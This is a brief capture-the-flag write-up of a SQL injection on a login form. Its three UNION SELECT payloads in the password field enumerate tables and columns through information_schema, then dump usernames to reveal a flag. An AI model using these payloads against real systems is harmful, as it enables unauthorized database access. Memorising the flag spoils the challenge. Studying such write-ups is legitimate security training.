Rating: 3.0
The webpage is vulnerable to [SQLI](https://en.wikipedia.org/wiki/SQL_injection) on fields `username` and `password`
With `username=a&password=' UNION select table_name from information_schema.tables; -- '` we can get the table name: `user`
`username=a&password=' UNION select column_name from information_schema.columns where column_name != 'password'; -- '`
The column in which we are interested in is `username`
Since with the first SQLi we've found that admin is a valid username, we'll start by excluding it:
`username=a&password=' UNION select username from user where username not in ('admin'); -- '`
The result is: `flag{470bbbc0519e4bc6987bb00bef24a97a}`